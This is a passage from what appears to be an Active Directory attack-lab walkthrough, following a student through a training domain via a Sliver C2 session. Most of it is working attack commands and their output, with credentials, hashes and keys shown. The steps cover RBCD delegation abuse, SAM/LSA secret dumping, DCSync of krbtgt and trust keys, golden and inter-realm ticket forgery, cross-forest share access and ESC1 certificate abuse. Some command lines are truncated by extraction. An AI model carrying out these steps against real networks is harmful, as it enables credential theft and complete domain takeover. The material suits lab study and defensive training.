ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Get-RBCD-Threaded.exe' '-u stud
entx -p 'JPIzbuWHdSfq9NFr' -d dollarcorp.moneycorp.local'
[*] Output:
This is the current domain: dollarcorp.moneycorp.local
The LDAP search base is LDAP://DC=dollarcorp,DC=moneycorp,DC=local
LDAP://dollarcorp.moneycorp.local:636
You want to search all trusted domains and forests!
The current forest is: moneycorp.local
[snip]
Enumerate ACLs...
Checking for ACLs with RBCD...
Number of possible RBCD ACLs: 1
RBCD ACL:
Source: ciadmin
Source Domain: dollarcorp.moneycorp.local
Destination: dcorp-mgmt.dollarcorp.moneycorp.local
Privilege: GenericWrite
Execution time = 2.4678037 seconds
Get-RBCD-Threaded:
-d|-domain FQDN domain to authentication to
It was found that dcorp\ciadmin has GenericWrite permissions over dcorp-mgmt.

Abuse a Computer Object with Write permissions
Using StandIn, PEzor, Rubeus
Dumping LSASS secrets on dcorp-ci we find dcorp\ciadmin plaintext credentials. To do so we first
impersonate the Domain Admin found earlier using Rubeus as follows.
psec /show /ptt'
[*] Output:
[*] Action: Ask TGT

LOGON_TYPE = 9
[+] LUID : 0xaab77

138ec5ca2835067719dc7011

UserName : svcadmin
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM

ble, forwardable
A2835067719DC7011
Remotely dump SAM using sharpsecdump we find dcorp\ciadmin credentials in Plaintext. We can use
these credentials to abuse the RBCD attack.
[server] sliver (dcorp-std_https) > sharpsecdump -P 2396 -p "C:\windows\syste
m32\taskhostw.exe" -t 60 '' "-target=dcorp-ci"
[*] sharpsecdump output:

[*] RemoteRegistry service started on dcorp-ci
[*] Parsing SAM hive on dcorp-ci
[*] Parsing SECURITY hive on dcorp-ci
[*] Sucessfully cleaned up on dcorp-ci
---------------Results from dcorp-ci---------------
[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31eb
e678a2
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e
0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c5
9d7e0c089c0
[*] Cached domain logon information(domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4ef
cdce983215
DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa
9ef2da703179
[*] LSA Secrets
[*] $MACHINE.ACC
dollarcorp.moneycorp.local\dcorp-ci$:aad3b435b51404eeaad3b435b51404ee:f76f48c
176dc09cfd5765843c32809f3
[*] DPAPI_SYSTEM
dpapi_machinekey:4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:eba6b8fb6245f03382bff91e8fb6fd323080b80c
[*] NL$KM
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e04
8f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_jenkins
dcorp\ciadmin:*ContinuousIntrusion123
---------------Script execution completed---------------
To abuse RBCD, we need a computer object to allow delegation rights. Creating a new computer isn’t as

OPSEC safe as using an already compromised machine account. In this case we use the dcorp-stdX
machine account.
Get the SID of the dcorp-stdX machine account using StandIn.

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --sid dcorp-studen
tX$
[*] Output:

[?] Object : CN=DCORP-STUDENTX
Path : LDAP://CN=DCORP-STUDENTX,CN=Computers,DC=dollarcorp,DC=moneyco
rp,DC=local
[+] User : DOLLARCORP.MONEYCORP.LOCAL\DCORP-STUDENTX$

SID : S-1-5-21-719815819-3726368948-3917688648-5105
Next use this SID to set RBCD delegation as dcorp\ciadmin over the dcorp-stdX machine account using
StandIn.
NOTE: If we do not have explicit credentials, it is possible to complete this attack using other prior
impersonation techniques as showcased in other objectives.

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' '--computer dcorp-
mgmt --sid "S-1-5-21-719815819-3726368948-3917688648-5105" --user ciadmin --p
ass "*ContinuousIntrusion123" --domain dollarcorp.moneycorp.local'
[*] Output:

local
[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity
Switch to the elevated persistent AbyssWebserver session.

[server] sliver (dcorp-std_https) > sessions -i b9cd498e
[*] Active session dcorp-std_https (b9cd498e)
[server] sliver (dcorp-std_https) > ps

====== ====== ============================== ========
[.........snip.......]

2160 584 NT AUTHORITY\SYSTEM x86_64 abyssws.exe 0
Dump AES Keys using mimikatz-ekeys.exe.packed.dotnet.exe binary in the elevated session as follows.
ystem32\wbem\WmiApSrv.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.p
acked.dotnet.exe'
[*] Output:
[........snip........]
Authentication Id : 0 ; 44045 (00000000:0000ac0d)

Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/19/2024 3:58:54 AM
SID : S-1-5-90-0-1
* Username : DCORP-STUDENTX$
* Domain : dollarcorp.moneycorp.local
* Password : #pn3 0/L.zNUNUZ:wHgzL6022d=fTSJKtXaUxBP%B@<`0JDuSf,W5q"
O@fpB!(c<1BXAvL-jo<nW`*DY!Q%$[o#$cLDgh/a2OOx,P1inI'V_7T^:5ZrZuIz/
* Key List :
des_cbc_md4 29a28164bb26ba3a79408bb1248bceee76c5bb8cb777bdde
af0f67500bbacb05
des_cbc_md4 d642f13e46cce541c9c0096311ee28a3
des_cbc_md4 3183f0e26d1bdd471b68b6c9edd873b5
Switch back to the primary dcorp\studentX session and use rubeus along with the dcorp-stdX$ hash to
abuse the RBCD rights to access CIFS on dcorp-mgmt as a Domain Administrator - dcorp\administrator.
[server] sliver (dcorp-std_https) > sessions -i 82c659f8
[*] Active session dcorp-std_https (82c659f8)
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\

system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 's4u /user:dcorp-s
tudentX$ /aes256:29a28164bb26ba3a79408bb1248bceee76c5bb8cb777bddeaf0f67500bba
cb05 /msdsspn:cifs/dcorp-mgmt /impersonateuser:administrator /domain:dollarco
rp.moneycorp.local /ptt'
[*] rubeus output:

[*] Action: S4U
[*] Using rc4_hmac hash: 22abe627783078e62462354b2e4d6813
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-stdX$
'
doIFqjCCBaagAw[..............snip..........]
[*] Action: S4U
[*] Building S4U2self request for: 'dcorp-stdX$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Got a TGS for 'administrator' to 'dcorp-stdX$@DOLLARCORP.MONEYCORP.LOCAL'
doIF/zCCBfugAw[..............snip..........]
[*] Impersonating user 'administrator' to target SPN 'cifs/dcorp-mgmt.dollarc

orp.moneycorp.local'
[*] Building S4U2proxy request for service: 'cifs/dcorp-mgmt.dollarcorp.money
corp.local'
[*] base64(ticket.kirbi) for SPN 'cifs/dcorp-mgmt.dollarcorp.moneycorp.local'
:
doIHHjCCBxqgAwIBBa[..............snip..........]
Access the filesystem of dcorp-mgmt as the domain administrator - dcorp\administrator.

[server] sliver (dcorp-std_https) > ls '\\dcorp-mgmt\c$'
\\dcorp-mgmt\c$\ (13 items, 384.4 MiB)

======================================
-r--r--r-- bootmgr 375.3 KiB Sat Jul 16 06:10:1
7 -0700 2021
-rw-rw-rw- BOOTNXT 1 B Sat Jul 16 06:10:1
7 -0700 2021
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Thu Feb 14 07:51:0
3 -0700 2024
-rw-rw-rw- pagefile.sys 384.0 MiB Sat May 07 09:40:5
2 -0700 2024
[..........snip.......]
Remove RBCD rights using StandIn as follows.

ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' '--computer dcorp-
mgmt --remove --user ciadmin --pass "*ContinuousIntrusion123" --domain dollar
corp.moneycorp.local'
[*] Output:

local
[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..

[*] rubeus output:

Luid: 0x0

Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the
parent domain, moneycorp.local using the domain trust key.
Escalate to Enterprise Admin using the domain trust key

Using PEzor & Rubeus
We can use the Cross trust key to move laterally from dollarcorp to the moneycorp domain, which can
be retrieved using SharpKatz.
To do so we first impersonate the Domain Admin found earlier using Rubeus as follows.
psec /show /ptt'
[*] Output:
[*] Action: Ask TGT

LOGON_TYPE = 9
[+] LUID : 0xaab77

138ec5ca2835067719dc7011


UserName : svcadmin
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
ble, forwardable
A2835067719DC7011
Use PEzor in a new Ubuntu WSL prompt to create a compatible .NET mimikatz binary to perform a
DCSync and retrieve the dcorp\mcorp$ Trust key: "lsadump::dcsync /user:dcorp\mcorp$
/domain:dollarcorp.moneycorp.local" "exit".
wsluser@dcorp-studentX:~$ sudo su

'"lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp.moneycorp.local" "exi
t"'
[?] Unhook enabled

[?] Fluctuate: NA
[?] Executing donut


[ File type : EXE
[ Parameters : "lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp.mo
neycorp.local" "exit"

[ Shellcode : "/tmp/tmp.deFRlDA39b/shellcode.cs"
[ Exit : Thread
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dcsync-trustkey.exe.pack
ed.dotnet.exe
Perform a DCSync and retrieve the dcorp\mcorp$ Trust key as follows.

ystem32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync-trustkey
.exe.packed.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08

mimikatz(commandline) # lsadump::dcsync /user:dcorp\mcorp$ /domain:dollarcorp

.moneycorp.local
[DC] 'dcorp\mcorp$' will be the user account
Object RDN : mcorp$
** SAM ACCOUNT **
SAM Username : mcorp$

Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Credentials:
Hash NTLM: 4312d947e30071bf8857ded56876e212
ntlm- 0: 4312d947e30071bf8857ded56876e212
ntlm- 1: 568d8db72d996cd37f962a8a08b0af00

ntlm- 4: af378b68e76d6378af82ddb110d2675b
ntlm- 5: af378b68e76d6378af82ddb110d2675b
ntlm- 6: 132f54e05f7c3db02e97c00ff3879067
ntlm- 7: 48919f3bb1d54f1b18b7315efc5d0c5f
ntlm- 8: 8869fb617349e81718e5e0e6d9c420b0
ntlm- 9: 8869fb617349e81718e5e0e6d9c420b0
ntlm-10: 4397d801004c52ed0585c1224f5ab498
lm - 0: 77382308b1f822b7477a0769a2032bc4
lm - 1: 01a453ecdc1adfbe518971798ed03970
lm - 2: 0ba6a01a030ab32109097e54526efdb1
lm - 3: d72096b0ef7fbbdf8050b421127b95d9
lm - 4: 75f6344f7a4e1c5ecdbd0b62cae10f06
lm - 5: ffa8d895ce5397838b72b99119f5078a
lm - 6: 04f9c9f394758fb0315d6a113cb3fc11
lm - 7: 3c846c41bde3bb4068bff16063572362
lm - 8: e8ef9fdd242c8b69dfa95b8361ecdbc4
lm - 9: e24e46118f4cfe8ec4b62cf1805d49b1
lm -10: 867303b137b6c259956651e924c64098
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtmcorp
Credentials
aes256_hmac (4096) : 7c66d95a09e42a74068694b9120672863ae78ae0b3c2
ddd894552579288a907f
[snip]
Purge the domain admin ticket using rubeus.

[*] rubeus output:

Luid: 0x0
We can now use the trust key to forge a cross trust ticket using Rubeus and use it for authentication to
gain a service ticket to a target such as CIFS as follows.
Tools/Rubeus.exe' 'silver /user:Administrator /ldap /service:krbtgt/DOLLARCOR
P.MONEYCORP.LOCAL /rc4:4312d947e30071bf8857ded56876e212 /sids:S-1-5-21-719815
819-3726368948-3917688648-519 /nowrap'
[*] Output:

[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-1028785420-4100948154-1806204659
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 4312D947E30071BF8857DED56876E212
[*] KDCKey : 4312D947E30071BF8857DED56876E212
[*] Target : DOLLARCORP.MONEYCORP.LOCAL

[*] Signing PAC
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'
[*] AuthTime : 1/22/2024 8:18:03 AM

[*] StartTime : 1/22/2024 8:18:03 AM
[*] EndTime : 1/22/2024 6:18:03 PM
[*] RenewTill : 1/29/2024 8:18:03 AM
doIGFjCCBhKgAw[snip]

Tools/Rubeus.exe' 'asktgs /service:CIFS/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc
.MONEYCORP.LOCAL /ptt /ticket:doIGFjCCBhKgAw[snip]'

[*] Got output:
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the

service ticket
[*] Building TGS-REQ request for: 'CIFS/mcorp-dc.MONEYCORP.LOCAL'
[*] Using domain controller: mcorp-dc.MONEYCORP.LOCAL (172.16.1.1)
[+] TGS request successful!
ServiceName : CIFS/mcorp-dc.MONEYCORP.LOCAL

ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
StartTime : 1/22/2024 8:19:40 AM
EndTime : 1/22/2024 6:18:03 PM
RenewTill : 1/29/2024 8:18:03 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent,
renewable, forwardable
Base64(key) : sBJxMjHQwKA4hDHBTT4sFLqzDBoTmmtPbmD8X6WT5OY=
Access CIFS to prove access as follows.

[server] sliver (dcorp-std_https) > ls '\\mcorp-dc.moneycorp.local\c$'
\\mcorp-dc.moneycorp.local\c$\ (14 items, 384.4 MiB)

====================================================
drwxrwxrwx $Recycle.Bin <dir> Sat Feb 16 22:14:5
0 -0700 2022
8 -0700 2022
8 -0700 2022
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Sat Feb 16 22:06:2
7 -0700 2024
drwxrwxrwx inetpub <dir> Mon Nov 08 09:25:5
9 -0700 2022
[snip]

Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the
parent domain, moneycorp.local using dollarcorp’s krbtgt hash.
Escalate privileges to Enterprise Admin using krbtgt hash

Using PEzor and Rubeus
We can use the krbtgt hash to move laterally from dollarcorp to the moneycorp domain, which can be
retrieved using mimikatz-dcsync.exe.packet.dotnet.exe.
Use rubeus to request a TGT as dcorp\svcadmin (domain administrator) to get Domain admin rights.
psec /show /ptt'
[*] Output:
[*] Action: Ask TGT

LOGON_TYPE = 9
[+] LUID : 0xaab77

138ec5ca2835067719dc7011


UserName : svcadmin
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
ble, forwardable
A2835067719DC7011
DCSync to retrieve the dcorp\krbtgt hash.

ed.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08


Object RDN : krbtgt
** SAM ACCOUNT **


Credentials:
lm - 0: ea03581a1268674a828bde6ab09db837
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b
3d914cbcb5a8c3cda848
Purge domain admin ticket using rubeus.

[*] rubeus output:

Luid: 0x0
We can now use Rubeus to forge a cross trust ticket as follows.

Tools/Rubeus.exe' 'golden /user:Administrator /domain:dollarcorp.moneycorp.lo
cal /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-96
0912869-3279953914-516,S-1-5-9 /aes256:154cb6624b1d859f7080a6615adc488f09f928
43879b3d914cbcb5a8c3cda848 /ptt'
[*] Action: Build TGT
[*] Building PAC

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8
C3CDA848
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8
C3CDA848

[*] Target : dollarcorp.moneycorp.local

[*] Signing PAC
[*] AuthTime : 1/22/2024 9:20:12 AM

[*] StartTime : 1/22/2024 9:20:12 AM
[*] EndTime : 1/22/2024 7:20:12 PM
[*] RenewTill : 1/29/2024 9:20:12 AM
doIGZDCCBmCgA[snip]

Check if we can access filesystem on mcorp-dc.


====================================================
drwxrwxrwx $Recycle.Bin <dir> Sat Feb 16 22:14:5
0 -0700 2022
8 -0700 2022
8 -0700 2022
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Sat Feb 16 22:06:2
7 -0700 2024
drwxrwxrwx inetpub <dir> Mon Nov 08 09:25:5
9 -0700 2022
[snip]

With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of
eurocorp.local forest.
Access the SharedwithDCorp share on eurocorp.local

Using PEzor, Sa-Netshares, & Rubeus
We can use the Cross trust key to move laterally from dollarcorp to the eurocorp domain, which can be
retrieved from dcorp-dc.
Note: Because of SID filtering we cannot abuse SID history injection attacks, we would rather gain
whatever privileges the current user (Enterprise admin) in the moneycorp forest has in the trusted
eurocorp forest. We cannot escalate to Enterprise Admins directly as before but can use these privileges
to access specifically shared resources and shares.
Gain a session on dcorp-dc as showcased in L0-8 and switch to this session.

[*] Session f6a3293d dcorp-dc_tcp - 172.16.100.X:50234->dcorp-std_https-> (dc
orp-dc) - windows/amd64 - Tue, 23 Jan 2024 03:03:06 PST-dc\c$\Windows (0 item
s, 0 B)
[server] sliver (dcorp-std_https) > sessions -i f6a3293d

[*] Active session dcorp-dc_tcp (f6a3293d)
To retrieve the dcorp\ecorp$ trust key, spawn a new Ubuntu prompt and use PEzor to create a
compatible .NET mimikatz binary with arguments for execution: "privilege::debug" "lsadump::trust
/patch" "exit".
wsluser@dcorp-studentX:~$ sudo su
root@dcorp-studentX:/home/wsluser# cd /mnt/c/AD/Tools/PEzor/

'"privilege::debug" "lsadump::trust /patch" "exit"'
[?] Unhook enabled

[?] Fluctuate: NA

[?] Executing donut


[ File type : EXE
[ Parameters : "privilege::debug" "lsadump::trust /patch" "exit"
[ Shellcode : "/tmp/tmp.mf9KoSCdIB/shellcode.cs"
[ Exit : Thread
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-trustkey.exe.packed.dotn
et.exe
Execute the mimikatz-trustkey.exe.packed.dotnet.exe and retrieve the ecorp$ Trust key as

follows.
[snip]
0

ystem32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-trustkey.exe.pa
cked.dotnet.exe'
[*] Output:
mimikatz # lsadump::trust /patch

[snip]
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL

* 1/1/2024 3:42:54 AM - CLEAR - bb 4c a4 1f c8 08 bc 89 d3 b7 11 3b 88
a5 15 c8 26 f2 5b c9 20 0a 1d d0 05 1e 69 26 7f 9e 50 1c 10 cd a0 cb 4a 75 9b
42 96 a4 93 a4 82 3f d8 9c e5 47 c6 c7 8c 50 7a 8e c9 a2 c6 0e 4c 6c 88 1d b
b b4 99 89 0e f3 e5 6f cf 39 24 33 ce be 50 d9 9f b5 f2 3c b7 69 1c b5 6a cf
1c 54 85 54 46 5a 63 20 da 1f 8e 4c 37 01 00 f8 f6 0d 5a 32 76 6b c1 ce b9 6f
f0 30 51 6f 18 96 8c 47 41 ec 7c f3 f3 0e 29 86 5f 3a 3b 89 6b 62 2f ce 84 b
d bc 4d ca f0 53 69 0e 40 57 b5 b5 12 2b 9e 5c 57 90 79 91 98 ec ad 9f 5d 73
81 ee 10 da 25 a8 09 9b db d8 40 8f 71 2f 56 14 d2 dd 8a 41 bb 61 ef be 79 fb

c7 57 da 0a 3e c9 6b 8f 78 43 6e de 25 3a 7b ca fc ec 88 3f ba 50 69 9b c4 0
2 4d e4 bf 32 fd f5 6c e7 ea 33 d2 11 04 5b 80 a6 2d 5e 59 79 ca
* aes256_hmac 14a5b2bba40a25718b9436a8a37528611620bcfce68b25dc7
de6915f06316c6c
* aes128_hmac 843f6fd516d6b012a4e2e8d4b8830bcc
* rc4_hmac_nt b70359171eaba09b47b6628a96acd306
[snip]
Purge the domain admin ticket using rubeus.

[*] rubeus output:

Luid: 0x0
Next use rubeus to inject the inter-realm TGT.

Tools/Rubeus.exe' 'silver /user:Administrator /ldap /service:krbtgt/DOLLARCOR
P.MONEYCORP.LOCAL /aes256:14a5b2bba40a25718b9436a8a37528611620bcfce68b25dc7de
6915f06316c6c /sid:S-1-5-21-719815819-3726368948-3917688648 /nowrap'
[*] rubeus output:

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 37AAA399EE910656637F1C876502FA72797BF708F7B0BD0FE4925FDE
75CA1B65
[*] KDCKey : 37AAA399EE910656637F1C876502FA72797BF708F7B0BD0FE4925FDE
75CA1B65
[*] Target : DOLLARCORP.MONEYCORP.LOCAL

[*] Signing PAC
[*] AuthTime : 1/22/2024 9:34:05 AM

[*] StartTime : 1/22/2024 9:34:05 AM
[*] EndTime : 1/22/2024 7:34:05 PM

[*] RenewTill : 1/29/2024 9:34:05 AM
doIGHDCCBhig[snip]
Next request a TGS for a service on eurocorp-dc. In this case we request a ticket for the CIFS service.
Tools/Rubeus.exe' 'asktgs /service:CIFS/eurocorp-dc.eurocorp.LOCAL /dc:euroco
rp-dc.eurocorp.LOCAL /ptt /ticket:doIGHDCCBhig[snip]'
[*] rubeus output
[*] Action: Ask TGS

[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the
service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[+] TGS request successful!
[........snip........]
ServiceName : cifs/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserRealm : dollarcorp.moneycorp.local
StartTime : 10/1/2022 4:05:54 AM
EndTime : 10/1/2022 2:05:54 PM
RenewTill : 10/8/2022 4:05:54 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent,
renewable, forwardable
Base64(key) : kmxfbuXjUiZ5LATsY9E7v2+6uM/Ua75bWgiJuCMhtQw=

Since we can only access explicitly shared shares let use enumerate the target shares on eurocorp-dc
using the sa-netshares BOF.
[server] sliver (dcorp-std_https) > sa-netshares -t 60 'eurocorp-dc.eurocorp.
local'
[*] Successfully executed sa-netshares (coff-loader)

[*] Got output:
Share:

---------------------eurocorp-dc.eurocorp.local------------------------------
----
ADMIN$
C$
IPC$
NETLOGON
SharedwithDCorp
SYSVOL
Checking for CIFS access it is noted that we have access to the SharedwithDCorp share.
[server] sliver (dcorp-std_https) > ls '\\eurocorp-dc.eurocorp.local\Sharedwi
thDcorp'
\\eurocorp-dc.eurocorp.local\SharedwithDcorp\ (1 item, 29 B)
============================================================
-rw-rw-rw- secret.txt 29 B Mon Jan 18 04:18:07 -0700 2024
[server] sliver (dcorp-std_https) > cat '\\eurocorp-dc.eurocorp.local\Sharedw

ithDcorp\secret.txt'
Dollarcorp DAs can read this!

• Check if AD CS is used by the target forest and find any vulnerable / abusable templates.
• Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.
Enumerating AD CS
Using Certify
We can use the Certify tool from the armory to check for AD CS in moneycorp. The cas command is used
to find information about all registered CAs.

ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' cas
[*] certify output:
[*] Action: Find certificate authorities

[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Root CAs
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, D

C=local
Cert Thumbprint : C57338DA8D0C5518C4587B1133265414D37C0573
Cert Serial : 7AC830DC3779E2924CBB43263C2F1B62
Cert Start Date : 11/8/2023 8:19:06 AM
Cert End Date : 11/8/2028 8:29:06 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=
local
[*] NTAuthCertificates - Certificates that enable authentication:
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, D

C=local
Cert Thumbprint : C57338DA8D0C5518C4587B1133265414D37C0573
Cert Serial : 7AC830DC3779E2924CBB43263C2F1B62
[………snip……...]
Certify completed in 00:00:18.4901272
We can list all the templates using the find command. Going through the output we can find some
interesting templates.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' find
[*] certify output:

[*] Action: Find certificate templates
[......snip.....]
CA Name : mcorp-dc.moneycorp.local\moneycor
p-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_
REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-1
874506631-3219952063-538504511-513
[.....snip.....]
p-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
[......snip.....]

Privilege Escalation to DA and EA using ESC1
Using Certify, Openssl and Rubeus
The template HTTPSCertificates looks interesting. Let’s get some more information about it as it allows
the requestor to supply subject name.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'find /enrolleeSup
pliesSubject'
[*] certify output:

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA

DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-
DC-CA
[.......snip.....]
p-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUB
LISH_TO_DS
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting
Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-
1874506631-3219952063-538504511-1116
[.......snip.....]
The HTTPSCertificates template grants enrollment rights to the RDPUsers group and allows the
requestor to supply a Subject Name. Recall that dcorp\studentX is a member of RDPUsers group. This
means that we can request a certificate for any user as dcorp\studentX.

Let’s request a certificate for the Domain Admin - dcorp\Administrator using the request module in
certify.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'request /ca:mcorp
-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altn
ame:administrator'
[*] certify output:
[*] Action: Request a Certificates

[*] Current user context : dcorp\studentX
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=studentX, CN=Users, DC=dollarcorp, DC=moneyc
orp, DC=local
[*] AltName : administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 65
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----

MIIEpAIBAAKCAQEA4//1KYY5YH56/uUB+Csy1ziMATrxMtGquZgXOaKOmWPRB0aN
OWhI3vrQWJ2pYl6KGx7t[.........snip......]
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced
Cryptographic Provider v1.0" -export -out cert.pfx
Copy all the text between —--BEGIN RSA PRIVATE KEY—-- and —--END CERTIFICATE—-- and save it as
esc1.pem.
We need to convert esc1.pem to PFX to use it. Spawn a new PowerShell prompt and use the openssl.exe
binary on windows to do that as follows. We can use an export password, we use Passw0rd! as the
export password in this case.
PS C:\AD\Tools> notepad C:\AD\Tools\esc1-DA.pem
PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-D

A.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -o
ut C:\AD\Tools\esc1-DA.pfx
Enter Export Password: Passw0rd!
Verifying - Enter Export Password: Passw0rd!
Use the converted PFX from above with Rubeus to request a TGT for the DA - Administrator as follows.

ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:admin
istrator /certificate:C:\AD\Tools\esc1-DA.pfx /password:Passw0rd! /ptt'
[*] rubeus output:
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=studentX, CN=Users, DC=d
ollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\admi
nistrator'
doIGWjCCBlagAwI[.........snip..........]

UserName : administrator
StartTime : 10/9/2023 12:35:10 AM
EndTime : 10/9/2023 10:35:10 AM
